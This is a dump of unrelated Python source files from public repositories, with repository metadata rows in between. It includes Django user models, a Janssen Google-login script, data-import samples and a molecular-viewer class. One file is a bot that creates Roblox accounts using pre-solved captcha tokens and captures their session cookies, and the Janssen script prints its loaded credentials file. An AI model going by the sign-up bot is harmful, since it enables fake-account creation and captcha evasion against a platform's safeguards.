def current_frame(self, value):
self.parent.current_frame = value
# returns true if the complex is selected on nanome.
def get_selected(self):
return self.parent.selected
def set_surface_needs_redraw(self):
self.parent.surface_dirty = True
@property
def box_label(self):
return self._box_label
@box_label.setter
def box_label(self, value):
self._box_label = value
class Molecular(object):
def __init__(self, parent):
self.parent = parent
@property
def name(self):
return self.parent.name
@name.setter
def name(self, value):
self.parent.name = value
@property
def index_tag(self):
return self.parent.index_tag
@index_tag.setter
def index_tag(self, value):
self.parent.index_tag = value
@property
def split_tag(self):
return self.parent.split_tag
@split_tag.setter
def split_tag(self, value):
self.parent.split_tag = value
class Transform(object):
def __init__(self, parent):
self.parent = parent
@property
def position(self):
return self.parent.position
@position.setter
def position(self, value):
self.parent.position = value
@property
def rotation(self):
return self.parent.rotation
@rotation.setter
def rotation(self, value):
self.parent.rotation = value
def get_workspace_to_complex_matrix(self):
rotation = Matrix.from_quaternion(self.parent.rotation)
rotation.transpose()
translation = Matrix.identity(4)
translation[0][3] = -self.parent.position.x
translation[1][3] = -self.parent.position.y
translation[2][3] = -self.parent.position.z
transformation = rotation * translation
return transformation
def get_complex_to_workspace_matrix(self):
result = self.parent.get_workspace_to_complex_matrix()
result = result.get_inverse()
return result
# endregion
Complex.io._setup_addon(Complex)
_Complex._create = Complex
| 25.139186 | 83 | 0.593782 | 1,288 | 11,740 | 5.220497 | 0.120342 | 0.050565 | 0.044468 | 0.032719 | 0.492267 | 0.434563 | 0.383551 | 0.298037 | 0.170732 | 0.145152 | 0 | 0.001882 | 0.32121 | 11,740 | 466 | 84 | 25.193133 | 0.841887 | 0.123424 | 0 | 0.460208 | 0 | 0 | 0.000614 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.273356 | false | 0 | 0.024221 | 0.079585 | 0.442907 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
579b07f7e2fa1f7d53a1230b84e41be5a5006de9 | 14,911 | py | Python | TWLight/users/models.py | Chinmay-Gurjar/TWLight | 94ff6e1bf0a8dd851e569c592608871de2ad3089 | [
"MIT"
] | null | null | null | TWLight/users/models.py | Chinmay-Gurjar/TWLight | 94ff6e1bf0a8dd851e569c592608871de2ad3089 | [
"MIT"
] | null | null | null | TWLight/users/models.py | Chinmay-Gurjar/TWLight | 94ff6e1bf0a8dd851e569c592608871de2ad3089 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
This file holds user profile information. (The base User model is part of
Django; profiles extend that with locally useful information.)
TWLight has three user types:
* editors
* coordinators
* site administrators.
_Editors_ are Wikipedia editors who are applying for TWL resource access
grants. We track some of their data here to facilitate access grant
decisions.
_Coordinators_ are the Wikipedians who have responsibility for evaluating
and deciding on access grants. Site administrators should add editors to the
Coordinators group through the Django admin site.
_Site administrators_ have admin privileges for this site. They have no special
handling in this file; they are handled through the native Django is_admin
flag, and site administrators have responsibility for designating who has that
flag through the admin site.
New users who sign up via oauth will be created as editors. Site administrators
may promote them to coordinators manually in the Django admin site, by adding
them to the coordinators group. They can also directly create Django user
accounts without attached Editors in the admin site, if for some reason it's
useful to have account holders without attached Wikipedia data.
"""
from datetime import datetime, timedelta
import json
import logging
import urllib2
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
from django.utils.timezone import now
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
logger = logging.getLogger(__name__)
class UserProfile(models.Model):
"""
This is for storing data that relates only to accounts on TWLight, _not_ to
Wikipedia accounts. All TWLight users have user profiles.
"""
class Meta:
app_label = 'users'
# Translators: Gender unknown. This will probably only be displayed on admin-only pages.
verbose_name = 'user profile'
verbose_name_plural = 'user profiles'
# Related name for backwards queries defaults to "userprofile".
user = models.OneToOneField(settings.AUTH_USER_MODEL)
# Have they agreed to our terms?
terms_of_use = models.BooleanField(default=False,
# Translators: Users must agree to the website terms of use.
help_text=_("Has this user agreed with the terms of use?"))
terms_of_use_date = models.DateField(blank=True, null=True,
#Translators: This field records the date the user agreed to the website terms of use.
help_text=_("The date this user agreed to the terms of use."))
# Translators: An option to set whether users email is copied to their website account from Wikipedia when logging in.
use_wp_email = models.BooleanField(default=True, help_text=_('Should we '
'automatically update their email from their Wikipedia email when they '
'log in? Defaults to True.'))
lang = models.CharField(max_length=128, null=True, blank=True,
choices=settings.LANGUAGES,
# Translators: Users' detected or selected language.
help_text=_("Language"))
# Create user profiles automatically when users are created.
def create_user_profile(sender, instance, created, **kwargs):
if created:
UserProfile.objects.create(user=instance)
models.signals.post_save.connect(create_user_profile,
sender=settings.AUTH_USER_MODEL)
class Editor(models.Model):
"""
This model is for storing data related to people's accounts on Wikipedia.
It is possible for users to have TWLight accounts and not have associated
editors (if the account was created via manage.py createsuperuser),
although some site functions will not be accessible.
"""
class Meta:
app_label = 'users'
# Translators: Gender unknown. This will probably only be displayed on admin-only pages.
verbose_name = 'wikipedia editor'
verbose_name_plural = 'wikipedia editors'
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Internal data ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
# Database recordkeeping.
user = models.OneToOneField(settings.AUTH_USER_MODEL)
# Set as non-editable.
date_created = models.DateField(default=now,
editable=False,
# Translators: The date the user's profile was created on the website (not on Wikipedia).
help_text=_("When this profile was first created"))
# ~~~~~~~~~~~~~~~~~~~~~~~ Data from Wikimedia OAuth ~~~~~~~~~~~~~~~~~~~~~~~#
# Uses same field names as OAuth, but with wp_ prefixed.
# Data are current *as of the time of TWLight signup* but may get out of
# sync thereafter.
wp_username = models.CharField(max_length=235,
help_text=_("Username"))
# Translators: The total number of edits this user has made to all Wikipedia projects
wp_editcount = models.IntegerField(help_text=_("Wikipedia edit count"),
blank=True, null=True)
# Translators: The date this user registered their Wikipedia account
wp_registered = models.DateField(help_text=_("Date registered at Wikipedia"),
blank=True, null=True)
wp_sub = models.IntegerField(unique=True,
# Translators: The User ID for this user on Wikipedia
help_text=_("Wikipedia user ID")) # WP user id.
# Should we want to filter these to check for specific group membership or
# user rights in future:
# Editor.objects.filter(wp_groups__icontains=groupname) or similar.
# Translators: Lists the user groups (https://en.wikipedia.org/wiki/Wikipedia:User_access_levels) this editor has. e.g. Confirmed, Administrator, CheckUser
wp_groups = models.TextField(help_text=_("Wikipedia groups"),
blank=True)
# Translators: Lists the individual user rights permissions the editor has on Wikipedia. e.g. sendemail, createpage, move
wp_rights = models.TextField(help_text=_("Wikipedia user rights"),
blank=True)
wp_valid = models.BooleanField(default=False,
# Translators: Help text asking whether the user met the requirements for access (see https://wikipedialibrary.wmflabs.org/about/) the last time they logged in (when their information was last updated).
help_text=_('At their last login, did this user meet the criteria in '
'the terms of use?'))
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~ User-entered data ~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributions = models.TextField(
# Translators: Describes information added by the user to describe their Wikipedia edits.
help_text=_("Wiki contributions, as entered by user"),
blank=True)
# Fields we may, or may not, have collected in the course of applications
# for resource grants.
# **** SENSITIVE USER DATA AHOY. ****
real_name = models.CharField(max_length=128, blank=True)
country_of_residence = models.CharField(max_length=128, blank=True)
occupation = models.CharField(max_length=128, blank=True)
affiliation = models.CharField(max_length=128, blank=True)
@cached_property
def wp_user_page_url(self):
url = u'{base_url}/User:{self.wp_username}'.format(
base_url=settings.TWLIGHT_OAUTH_PROVIDER_URL, self=self)
return url
@cached_property
def wp_talk_page_url(self):
url = u'{base_url}/User_talk:{self.wp_username}'.format(
base_url=settings.TWLIGHT_OAUTH_PROVIDER_URL, self=self)
return url
@cached_property
def wp_email_page_url(self):
url = u'{base_url}/Special:EmailUser/{self.wp_username}'.format(
base_url=settings.TWLIGHT_OAUTH_PROVIDER_URL, self=self)
return url
@cached_property
def wp_link_guc(self):
url = u'{base_url}?user={self.wp_username}'.format(
base_url='https://tools.wmflabs.org/guc/',
self=self
)
return url
@cached_property
def wp_link_central_auth(self):
url = u'{base_url}&target={self.wp_username}'.format(
base_url='https://meta.wikimedia.org/w/index.php?title=Special%3ACentralAuth',
self=self
)
return url
@property
def get_wp_rights_display(self):
"""
This should be used to display wp_rights in a template, or any time
we need to manipulate the rights as a list rather than a string.
Doesn't exist for batch loaded users.
"""
if self.wp_groups:
return json.loads(self.wp_rights)
else:
return None
@property
def get_wp_groups_display(self):
"""
As above, but for groups.
"""
if self.wp_groups:
return json.loads(self.wp_groups)
else:
return None
def _is_user_valid(self, identity, global_userinfo):
"""
Check for the eligibility criteria laid out in the terms of service.
To wit, users must:
* Have >= 500 edits
* Be active for >= 6 months
* Have Special:Email User enabled
* Not be blocked on any projects
Note that we won't prohibit signups or applications on this basis.
Coordinators have discretion to approve people who are near the cutoff.
Furthermore, editors who are active on multiple wikis may meet this
minimum when their account activity is aggregated even if they do not
meet it on their home wiki - but we can only check the home wiki.
"""
try:
# Check: >= 500 edits
assert int(global_userinfo['editcount']) >= 500
# Check: registered >= 6 months ago
# Try oauth registration date first. If it's not valid, try the global_userinfo date
try:
reg_date = datetime.strptime(identity['registered'], '%Y%m%d%H%M%S').date()
except:
reg_date = datetime.strptime(global_userinfo['registration'], '%Y-%m-%dT%H:%M:%SZ').date()
assert datetime.today().date() - timedelta(days=182) >= reg_date
# Check: not blocked
assert identity['blocked'] == False
return True
# Was assertion error, now we're catching any error in case we have
# an API communication or data problem.
except:
logger.exception('Editor was not valid.')
return False
def get_global_userinfo(self, identity):
"""
Grab global user information from the API, which we'll use to overlay
somme local wiki user info returned by OAuth. Returns a dict like:
global_userinfo:
home: "zhwikisource"
id: 27666025
registration: "2013-05-05T16:00:09Z"
name: "Example"
editcount: 10
"""
try:
endpoint = '{base}/w/api.php?action=query&meta=globaluserinfo&guiuser={username}&guiprop=editcount&format=json&formatversion=2'.format(base=identity['iss'],username=urllib2.quote(identity['username'].encode('utf8')))
results = json.loads(urllib2.urlopen(endpoint).read())
global_userinfo = results['query']['globaluserinfo']
try:
assert 'missing' not in global_userinfo
logger.info('Fetched global_userinfo for User.')
return global_userinfo
except AssertionError:
logger.exception('Could not fetch global_userinfo for User.')
return None
pass
except:
logger.exception('Could not fetch global_userinfo for User.')
return None
pass
def update_from_wikipedia(self, identity, lang):
"""
Given the dict returned from the Wikipedia OAuth /identify endpoint,
update the instance accordingly.
This assumes that we have used wp_sub to match the Editor and the
Wikipedia info.
Expected identity data:
{
'username': identity['username'], # wikipedia username
'sub': identity['sub'], # wikipedia ID
'rights': identity['rights'], # user rights on-wiki
'groups': identity['groups'], # user groups on-wiki
'editcount': identity['editcount'],
'email': identity['email'],
# Date registered: YYYYMMDDHHMMSS
'registered': identity['registered']
}
We could attempt to harvest real name, but we won't; we'll let
users enter it if required by partners, and avoid knowing the
data otherwise.
"""
try:
assert self.wp_sub == identity['sub']
except AssertionError:
logger.exception('Was asked to update Editor data, but the '
'WP sub in the identity passed in did not match the wp_sub on '
'the instance. Not updating.')
raise
global_userinfo = self.get_global_userinfo(identity)
self.wp_username = identity['username']
self.wp_rights = json.dumps(identity['rights'])
self.wp_groups = json.dumps(identity['groups'])
if global_userinfo:
self.wp_editcount = global_userinfo['editcount']
# Try oauth registration date first. If it's not valid, try the global_userinfo date
try:
reg_date = datetime.strptime(identity['registered'], '%Y%m%d%H%M%S').date()
except TypeError, ValueError:
try:
reg_date = datetime.strptime(global_userinfo['registration'], '%Y-%m-%dT%H:%M:%SZ').date()
except TypeError, ValueError:
reg_date = None
pass
self.wp_registered = reg_date
self.wp_valid = self._is_user_valid(identity, global_userinfo)
self.save()
# This will be True the first time the user logs in, since use_wp_email
# defaults to True. Therefore we will initialize the email field if
# they have an email at WP for us to initialize it with.
if self.user.userprofile.use_wp_email:
try:
self.user.email = identity['email']
except KeyError:
# Email isn't guaranteed to be present in identity - don't do
# anything if we can't find it.
logger.exception('Unable to get Editor email address from Wikipedia.')
pass
self.user.save()
# Add language if the user hasn't selected one
if not self.user.userprofile.lang:
self.user.userprofile.lang = lang
self.user.userprofile.save()
def __unicode__(self):
return _(u'{wp_username}').format(
# Translators: Do not translate.
wp_username=self.wp_username)
def get_absolute_url(self):
return reverse('users:editor_detail', kwargs={'pk': self.pk})
| 40.409214 | 228 | 0.652002 | 1,892 | 14,911 | 5.029598 | 0.2574 | 0.027953 | 0.007356 | 0.015132 | 0.191992 | 0.163199 | 0.163199 | 0.132619 | 0.122846 | 0.110866 | 0 | 0.005702 | 0.259003 | 14,911 | 368 | 229 | 40.519022 | 0.855553 | 0.196365 | 0 | 0.350575 | 0 | 0.005747 | 0.182868 | 0.037741 | 0 | 0 | 0 | 0 | 0.04023 | 0 | null | null | 0.028736 | 0.057471 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
579e371e955563dc8f4d6412367c0fd0a22213bb | 167 | py | Python | Exercicios Python/exlista01.py | oswaldo-spadari/Python-Exec | 3c3a237ed7c30af43f23a3619f6c6b92f6fcb12e | [
"MIT"
] | null | null | null | Exercicios Python/exlista01.py | oswaldo-spadari/Python-Exec | 3c3a237ed7c30af43f23a3619f6c6b92f6fcb12e | [
"MIT"
] | null | null | null | Exercicios Python/exlista01.py | oswaldo-spadari/Python-Exec | 3c3a237ed7c30af43f23a3619f6c6b92f6fcb12e | [
"MIT"
] | null | null | null | #Faça um Programa que leia um vetor de 5 números inteiros e mostre-os.
lista=[]
for i in range(1, 6):
lista.append(int(input('Digite um número: ')))
print(lista)
| 23.857143 | 70 | 0.694611 | 30 | 167 | 3.866667 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 0.173653 | 167 | 6 | 71 | 27.833333 | 0.818841 | 0.413174 | 0 | 0 | 0 | 0 | 0.185567 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57a48b0dacbc22f4bad998cd06e891c64fb838c5 | 7,652 | py | Python | jans-linux-setup/jans_setup/static/extension/person_authentication/GoogleExternalAuthenticator.py | nikdavnik/jans | 5e9abc74cca766a066512eab2aca6563ce480bff | [
"Apache-2.0"
] | 18 | 2022-01-13T13:45:13.000Z | 2022-03-30T04:41:18.000Z | jans-linux-setup/jans_setup/static/extension/person_authentication/GoogleExternalAuthenticator.py | nikdavnik/jans | 5e9abc74cca766a066512eab2aca6563ce480bff | [
"Apache-2.0"
] | 604 | 2022-01-13T12:32:50.000Z | 2022-03-31T20:27:36.000Z | jans-linux-setup/jans_setup/static/extension/person_authentication/GoogleExternalAuthenticator.py | nikdavnik/jans | 5e9abc74cca766a066512eab2aca6563ce480bff | [
"Apache-2.0"
] | 8 | 2022-01-28T00:23:25.000Z | 2022-03-16T05:12:12.000Z | # Janssen Project software is available under the Apache 2.0 License (2004). See http://www.apache.org/licenses/ for full text.
# Copyright (c) 2020, Janssen Project
#
# Author: Madhumita Subramaniam
#
from io.jans.service.cdi.util import CdiUtil
from io.jans.as.server.security import Identity
from io.jans.model.custom.script.type.auth import PersonAuthenticationType
from io.jans.as.server.service import AuthenticationService, UserService
from io.jans.util import StringHelper
from io.jans.as.server.util import ServerUtil
from io.jans.as.common.model.common import User
from io.jans.orm import PersistenceEntryManager
from io.jans.as.persistence.model.configuration import GluuConfiguration
from java.math import BigInteger
from java.security import SecureRandom
import java
import sys
import json
from java.util import Collections, HashMap, HashSet, ArrayList, Arrays, Date
from com.google.api.client.googleapis.auth.oauth2 import GoogleIdToken
from com.google.api.client.googleapis.auth.oauth2.GoogleIdToken import Payload
from com.google.api.client.googleapis.auth.oauth2 import GoogleIdTokenVerifier
from com.google.api.client.http.javanet import NetHttpTransport;
from com.google.api.client.json.jackson2 import JacksonFactory;
class PersonAuthentication(PersonAuthenticationType):
def __init__(self, currentTimeMillis):
self.currentTimeMillis = currentTimeMillis
def init(self, customScript, configurationAttributes):
print "Google. Initialization"
google_creds_file = configurationAttributes.get("google_creds_file").getValue2()
# Load credentials from file
f = open(google_creds_file, 'r')
try:
data = json.loads(f.read())
print data
creds = data["web"]
print creds
except:
print "Google. Initialization. Failed to load creds from file:", google_creds_file
print "Exception: ", sys.exc_info()[1]
return False
finally:
f.close()
self.client_id = str(creds["client_id"])
self.project_id = str(creds["project_id"])
self.auth_uri = str(creds["auth_uri"])
self.token_uri = str(creds["token_uri"])
self.auth_provider_x509_cert_url = str(creds["auth_provider_x509_cert_url"])
self.redirect_uris = str(creds["redirect_uris"])
self.javascript_origins = str(creds["javascript_origins"])
print "Google. Initialized successfully"
return True
def destroy(self, configurationAttributes):
print "Google. Destroy"
print "Google. Destroyed successfully"
return True
def getAuthenticationMethodClaims(self, requestParameters):
return None
def getApiVersion(self):
return 11
def isValidAuthenticationMethod(self, usageType, configurationAttributes):
return True
def getAlternativeAuthenticationMethod(self, usageType, configurationAttributes):
return None
def authenticate(self, configurationAttributes, requestParameters, step):
authenticationService = CdiUtil.bean(AuthenticationService)
if (step == 1):
print "Google. Authenticate for step 1"
identity = CdiUtil.bean(Identity)
googleCred = ServerUtil.getFirstValue(requestParameters, "credential")
if googleCred is not None:
googleIdToken = ServerUtil.getFirstValue(requestParameters, "credential")
google_Id = self.verifyIDToken(googleIdToken)
# if user doesnt exist in persistence, add
foundUser = self.findUserByGoogleId(google_Id)
if foundUser is None:
foundUser = User()
foundUser.setAttribute("jansExtUid", "passport-google:"+google_Id)
foundUser.setAttribute(self.getLocalPrimaryKey(),google_Id)
userService = CdiUtil.bean(UserService)
result = userService.addUser(foundUser, True)
foundUser = self.findUserByGoogleId(google_Id)
logged_in = authenticationService.authenticate(foundUser.getUserId())
return logged_in
else:
credentials = identity.getCredentials()
user_name = credentials.getUsername()
user_password = credentials.getPassword()
logged_in = False
if (StringHelper.isNotEmptyString(user_name) and StringHelper.isNotEmptyString(user_password)):
logged_in = authenticationService.authenticate(user_name, user_password)
return logged_in
else:
print "Google. Authenticate Error"
return False
def verifyIDToken(self, googleIdToken):
verifier = GoogleIdTokenVerifier.Builder(NetHttpTransport(), JacksonFactory()).setAudience(Collections.singletonList(self.client_id)).build()
# the GoogleIdTokenVerifier.verify() method verifies the JWT signature, the aud claim, the iss claim, and the exp claim.
idToken = verifier.verify(googleIdToken)
if idToken is not None:
payload = idToken.getPayload()
userId = payload.getSubject()
print "User ID: %s" % userId
#email = payload.getEmail()
#emailVerified = Boolean.valueOf(payload.getEmailVerified())
#name = str( payload.get("name"))
#pictureUrl = str(payload.get("picture"))
#locale = str( payload.get("locale"))
#familyName = str( payload.get("family_name"))
#givenName = str( payload.get("given_name"))
return userId
else :
print "Invalid ID token."
return None
def findUserByGoogleId(self, googleId):
userService = CdiUtil.bean(UserService)
return userService.getUserByAttribute("jansExtUid", "passport-google:"+googleId)
def getLocalPrimaryKey(self):
entryManager = CdiUtil.bean(PersistenceEntryManager)
config = GluuConfiguration()
config = entryManager.find(config.getClass(), "ou=configuration,o=jans")
#Pick (one) attribute where user id is stored (e.g. uid/mail)
# primaryKey is the primary key on the backend AD / LDAP Server
# localPrimaryKey is the primary key on Gluu. This attr value has been mapped with the primary key attr of the backend AD / LDAP when configuring cache refresh
uid_attr = config.getIdpAuthn().get(0).getConfig().findValue("localPrimaryKey").asText()
print "Casa. init. uid attribute is '%s'" % uid_attr
return uid_attr
def prepareForStep(self, configurationAttributes, requestParameters, step):
if (step == 1):
print "Google. Prepare for Step 1"
identity = CdiUtil.bean(Identity)
identity.setWorkingParameter("gclient_id",self.client_id)
return True
else:
return False
def getExtraParametersForStep(self, configurationAttributes, step):
return None
def getCountAuthenticationSteps(self, configurationAttributes):
return 1
def getPageForStep(self, configurationAttributes, step):
if(step == 1):
return "/auth/google/login.xhtml"
return ""
def getNextStep(self, configurationAttributes, requestParameters, step):
return -1
def getLogoutExternalUrl(self, configurationAttributes, requestParameters):
print "Get external logout URL call"
return None
def logout(self, configurationAttributes, requestParameters):
return True
| 39.854167 | 167 | 0.673811 | 779 | 7,652 | 6.545571 | 0.336329 | 0.01059 | 0.017651 | 0.011767 | 0.098058 | 0.040792 | 0.040792 | 0.027064 | 0.018827 | 0 | 0 | 0.005527 | 0.243335 | 7,652 | 191 | 168 | 40.062827 | 0.87513 | 0.122713 | 0 | 0.210526 | 0 | 0 | 0.089035 | 0.011055 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.037594 | 0.150376 | null | null | 0.112782 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57a71c30a72ab6617b2351c0866f4abcd021aacb | 1,709 | py | Python | example/sign up.py | Roblox-Thot/captchaCodeMakerV2 | 0d9e1a85b75e0c71f9c8b35d8330f704b1464685 | [
"Apache-2.0"
] | 7 | 2021-12-10T16:37:15.000Z | 2022-03-07T09:29:36.000Z | example/sign up.py | Roblox-Thot/captchaCodeMakerV2 | 0d9e1a85b75e0c71f9c8b35d8330f704b1464685 | [
"Apache-2.0"
] | null | null | null | example/sign up.py | Roblox-Thot/captchaCodeMakerV2 | 0d9e1a85b75e0c71f9c8b35d8330f704b1464685 | [
"Apache-2.0"
] | 9 | 2022-01-15T15:32:58.000Z | 2022-03-08T21:28:38.000Z | # This code could be improved but its just a example on how to use the code from the site
import requests, base64, random, string
token = input("Put code here:\n")
headers = {
'authority': 'auth.roblox.com',
'dnt': '1',
'x-csrf-token': requests.post("https://auth.roblox.com/v2/login").headers["x-csrf-token"],
'sec-ch-ua-mobile': '?0',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36',
'content-type': 'application/json;charset=UTF-8',
'accept': 'application/json, text/plain, */*',
}
username = ''.join(random.choice(string.ascii_letters) for i in range(20))
tokens = base64.b64decode(token).decode('utf-8').split(',')
data = {
"username":username,
"password":username[::-1],
"birthday":"01 Oct 2003",
"gender":1,
"isTosAgreementBoxChecked":True,
"context":"MultiverseSignupForm",
"referralData":None,
"displayAvatarV2":False,
"displayContextV2":False,
"captchaId":tokens[0],
"captchaToken":tokens[1],
"captchaProvider":"PROVIDER_ARKOSE_LABS",
"agreementIds":["54d8a8f0-d9c8-4cf3-bd26-0cbf8af0bba3","848d8d8f-0e33-4176-bcd9-aa4e22ae7905"]
}
response = requests.post('https://auth.roblox.com/v2/signup', headers=headers, json=data)
# Debug
#print(response)
#print()
#print(response.text)
#print()
try:
cookie = response.cookies[".ROBLOSECURITY"]
print()
print(f'login: {username}:{username[::-1]}')
print(f'\nCookie:\n{cookie}')
try: #trys to copy the cookie if you have pyperclip installed
import pyperclip
pyperclip.copy(cookie)
except:
pass
except:
print("Failed to create")
pass
| 30.517857 | 135 | 0.664716 | 219 | 1,709 | 5.173516 | 0.652968 | 0.026478 | 0.034422 | 0.03707 | 0.056487 | 0.056487 | 0.056487 | 0 | 0 | 0 | 0 | 0.062674 | 0.159743 | 1,709 | 55 | 136 | 31.072727 | 0.726323 | 0.115272 | 0 | 0.142857 | 0 | 0.02381 | 0.478723 | 0.101729 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.071429 | 0.047619 | 0 | 0.047619 | 0.095238 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
57a95284d7934e75842077f077664e4ddceff207 | 3,191 | py | Python | examples/experimental/scala-parallel-recommendation-entitymap/data/import_eventserver.py | pferrel/incubator-predictionio | 4b2fb7c1b6a1cd1027a4c03e6ae1af223c8e634c | [
"Apache-2.0"
] | 2 | 2017-03-10T03:03:14.000Z | 2017-07-03T02:38:42.000Z | examples/experimental/scala-parallel-recommendation-entitymap/data/import_eventserver.py | michaelzzh/LF_PredictionIO | 98bfd4d75efaab7633697f12e31e791660dbd61a | [
"Apache-2.0"
] | null | null | null | examples/experimental/scala-parallel-recommendation-entitymap/data/import_eventserver.py | michaelzzh/LF_PredictionIO | 98bfd4d75efaab7633697f12e31e791660dbd61a | [
"Apache-2.0"
] | null | null | null | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Import sample data for recommendation engine
"""
import predictionio
import argparse
import random
SEED = 3
def import_events(client):
random.seed(SEED)
count = 0
print "Importing data..."
# generate 10 users, with user uid1,2,....,10
# with some random attributes
user_ids = [ ("uid"+str(i)) for i in range(1, 11)]
for user_id in user_ids:
print "Set user", user_id
client.create_event(
event="$set",
entity_type="user",
entity_id=user_id,
properties={
"attr0" : float(random.randint(0, 4)),
"attr1" : random.randint(10, 14),
"attr2" : random.randint(20, 24)
}
)
count += 1
# generate 50 items, with iid1,2,....,50
# with some randome attributes
item_ids = [ ("iid"+str(i)) for i in range(1, 51)]
for item_id in item_ids:
print "Set item", item_id
client.create_event(
event="$set",
entity_type="item",
entity_id=item_id,
properties={
"attrA" : random.choice(["something1", "something2", "valueX"]),
"attrB" : random.randint(10, 30),
"attrC" : random.choice([True, False])
}
)
count += 1
# each user randomly rate or buy 10 items
for user_id in user_ids:
for viewed_item in random.sample(item_ids, 10):
if (random.randint(0, 1) == 1):
print "User", user_id ,"rates item", viewed_item
client.create_event(
event="rate",
entity_type="user",
entity_id=user_id,
target_entity_type="item",
target_entity_id=item_id,
properties= { "rating" : float(random.randint(1, 6)) }
)
else:
print "User", user_id ,"buys item", viewed_item
client.create_event(
event="buy",
entity_type="user",
entity_id=user_id,
target_entity_type="item",
target_entity_id=item_id
)
count += 1
print "%s events are imported." % count
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Import sample data for recommendation engine")
parser.add_argument('--access_key', default='invald_access_key')
parser.add_argument('--url', default="http://localhost:7070")
args = parser.parse_args()
print args
client = predictionio.EventClient(
access_key=args.access_key,
url=args.url,
threads=5,
qsize=500)
import_events(client)
| 29.546296 | 74 | 0.651833 | 432 | 3,191 | 4.675926 | 0.395833 | 0.023762 | 0.033663 | 0.043564 | 0.237624 | 0.220792 | 0.164356 | 0.10396 | 0.067327 | 0.067327 | 0 | 0.025841 | 0.235976 | 3,191 | 107 | 75 | 29.82243 | 0.802707 | 0.291758 | 0 | 0.291667 | 0 | 0 | 0.135865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.111111 | null | null | 0.097222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57b0f06734d5293b4bc104ab02dc176064141a7e | 4,137 | py | Python | gunmel/models.py | zhenkai/xgunicorn | 33fc122fdc9435ba0b6562186d3c86d983eb992a | [
"Apache-2.0"
] | null | null | null | gunmel/models.py | zhenkai/xgunicorn | 33fc122fdc9435ba0b6562186d3c86d983eb992a | [
"Apache-2.0"
] | null | null | null | gunmel/models.py | zhenkai/xgunicorn | 33fc122fdc9435ba0b6562186d3c86d983eb992a | [
"Apache-2.0"
] | 1 | 2020-03-03T04:04:56.000Z | 2020-03-03T04:04:56.000Z | from django.core.exceptions import ValidationError
from django.db import models
from django.forms.models import model_to_dict
from decimal import Decimal
# Create your models here.
class ProductManager(models.Manager):
def top_drops(self, n):
return self.get_queryset().order_by('-price_drop')[:n]
def top_clicks(self, n):
return self.get_queryset().annotate(clicks=models.Count('clicklog')).order_by('-clicks')[:n]
class Product(models.Model):
pid = models.IntegerField(primary_key=True, verbose_name="Product ID") # generated using murmur3 on url
url = models.URLField(max_length=2000, verbose_name="Product URL")
img = models.URLField(max_length=2000, verbose_name="Product Image")
headline = models.CharField(max_length=256)
vendor = models.CharField(max_length=128)
price = models.DecimalField(max_digits=9, decimal_places=2, verbose_name="Product Price")
price_drop = models.IntegerField(verbose_name="Product Price Drop Percentage",
db_index=True, default=0)
oos = models.BooleanField(default=False, verbose_name="Product Out of Stock")
last_modified = models.DateTimeField(verbose_name="Last modified time")
objects = ProductManager()
def clean(self):
if self.price < 0.0:
